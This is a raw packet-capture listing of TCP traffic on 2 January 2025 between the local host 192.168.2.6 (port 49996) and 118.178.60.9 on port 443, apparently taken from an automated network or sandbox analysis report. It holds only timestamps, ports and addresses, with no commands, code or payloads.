Jan 2, 2025 12:15:37.136838913 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.146538973 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.146604061 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.146662951 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.146728992 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.150908947 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.150955915 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.151034117 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.151077032 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.159336090 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.159420967 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.159451008 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.159495115 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.171664000 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.171741009 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.171794891 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.171844006 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.188527107 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.188572884 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.188649893 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.188673973 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.188678980 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.188683987 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.188721895 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.188812017 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.188863993 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.189059973 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.189091921 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.189102888 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.189120054 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.189140081 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.189158916 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.189480066 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.189524889 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.189528942 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.189537048 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.189575911 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.193707943 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.193775892 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.193798065 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.193845034 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.200063944 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.200171947 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.200242996 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.200301886 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.206582069 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.206665039 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.206804991 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.206865072 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.209244013 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.209302902 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.214077950 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.214140892 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.214195967 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.214240074 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.217003107 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.217068911 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.217089891 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.217142105 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.220747948 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.220812082 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.220846891 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.220873117 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.220911980 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.220933914 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.227572918 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.227619886 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.227662086 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.227689981 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.227713108 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.227741003 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.237447977 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.237494946 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.237548113 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.237571955 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.237591982 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.237631083 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.241828918 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.241873026 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.241909981 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.241929054 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.241955042 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.241972923 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.250252962 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.250308037 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.250319958 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.250339031 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.250360966 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.250407934 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.262547970 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.262649059 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.262680054 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.262743950 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.279359102 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.279398918 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.279459953 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.279484034 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.279499054 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.279526949 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.279617071 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.279660940 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.279661894 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.279670954 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.279701948 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.279740095 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.279791117 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.279970884 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.280026913 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.280065060 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.280114889 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.280478001 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.280528069 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.284622908 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.284686089 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.284709930 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.284769058 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.291034937 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.291125059 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.291204929 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.291260004 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.297717094 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.297749043 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.297786951 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.297796011 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.297811031 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.299894094 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.300204992 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.300275087 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.300323963 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.300381899 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.304991007 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.305082083 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.305155039 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.305217028 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.308082104 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.308130026 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.308428049 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.308435917 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.308505058 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.311666012 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.311741114 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.311845064 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.311932087 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.318622112 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.318684101 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.318705082 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.318748951 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.329464912 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.329500914 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.329528093 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.329543114 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.329555988 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.329590082 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.333144903 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.333221912 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.333226919 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.333235979 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.333281040 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.341533899 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.341572046 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.341595888 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.341604948 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.341619968 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.341648102 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.360173941 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.360241890 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.360287905 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.360337973 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.370240927 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.370305061 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.370372057 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.370421886 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.370615005 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.370666027 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.370718956 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.370769024 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.371157885 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.371189117 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.371201992 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.371211052 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.371227980 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.371253967 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.371256113 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.371265888 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.371310949 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.371536970 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.371614933 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.375693083 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.375752926 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.375755072 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.375775099 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.375803947 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.375817060 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.382081985 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.382138968 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.382188082 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.382236004 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.388577938 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.388659000 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.388667107 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.388722897 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.391217947 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.391298056 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.391406059 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.391464949 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.396342993 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.396378994 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.396421909 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.396434069 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.396472931 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.396495104 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.399122000 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.399202108 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.399251938 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.399306059 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.402698994 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.402744055 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.402785063 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.402791977 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.402806044 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.402879953 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.409538984 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.409605026 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.409679890 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.409730911 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.419737101 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.419797897 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.419805050 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.419822931 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.419850111 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.419872999 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.424187899 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.424240112 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.424307108 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.424356937 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.432461023 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.432526112 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.432686090 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.432746887 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.451282978 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.451342106 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.451369047 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.451384068 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.451400995 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.451423883 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.461431026 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.461477995 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.461518049 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.461549997 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.461564064 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.461695910 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.461782932 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.461782932 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.461795092 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.461870909 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.461919069 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.461927891 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.461971998 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.461987972 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.462034941 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.462071896 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.462121010 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.462459087 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.462521076 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.466639996 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.466675043 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.466702938 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.466710091 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.466739893 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.466764927 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.473020077 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.473093987 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.473110914 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.473119020 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.473141909 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.473164082 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.479639053 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.479679108 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.479759932 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.479773045 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.479815960 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.479837894 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.482366085 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.482429028 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.482438087 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.482449055 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.482496977 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.487143993 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.487198114 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.487210035 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.487219095 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.487247944 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.487270117 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.488914013 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.490113974 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.490169048 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.490226984 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.490273952 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.493798971 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.493835926 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.493885994 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.493897915 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.493911982 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.493940115 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.500483036 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.500569105 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.500571966 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.500582933 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.500664949 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.510843039 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.510895967 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.510921001 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.510932922 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.510947943 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.510987043 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.515180111 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.515292883 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.515353918 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.515403986 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.523458004 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.523534060 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.523674011 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.523721933 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.534873962 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.542120934 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.542191029 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.542228937 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.542277098 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.552386045 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.552494049 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.552498102 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.552508116 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.552548885 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.552679062 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.552731991 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.553051949 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.553087950 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.553116083 CET	49996	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:37.553128958 CET	443	49996	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:37.553144932 CET	49996	443	192.168.2.6	118.178.60.9
